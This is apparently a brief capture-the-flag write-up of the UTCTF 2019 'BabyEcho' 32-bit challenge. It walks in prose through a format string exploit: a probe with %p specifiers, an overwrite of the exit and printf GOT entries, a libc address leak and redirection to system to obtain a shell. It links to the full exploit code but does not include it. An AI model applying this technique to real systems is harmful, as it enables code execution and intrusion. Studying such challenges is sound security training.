Tags: pwn

Rating:

### writeup by P4W @ beerPWN sec-team

# UTCTF 2019 CTF
## BabyEcho's pwn level 700 pti

Basic analyzes on the binary.

\$ file pwnablepwnable: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ec115d32827da438599fe9b40b626d7214aa4e73, not stripped

gef➤  checksec[+] checksec for 'pwnable'Canary                        : NoNX                            : YesPIE                           : NoFortify                       : NoRelRO                         : Partial

So the GOT table is writable fortunatly for us.
By simply run the binary and passing
%p.%p.%p
as input we can verify that it's a format string challenge.
Next step is just try to figure out how we can exploit this.
Since the GOT has write permission then we can abuse this using the format string and overwrite some entry in the GOT table.
First thing that we can do is overwrite the GOT entry for the exit() function with the address of main() func, in this way we can restart the execution.
After that we just have to leak some libc address using the format string and overwrite the [email protected] with the address of the system address.
In this way we can drop a shell by just passing the string "sh" to the printf function that now will be point to the system address.
Here you can find the full exploit.

Original writeup (https://github.com/beerpwn/ctf/tree/master/2019/UTCTF_ctf/pwn/baby_echo).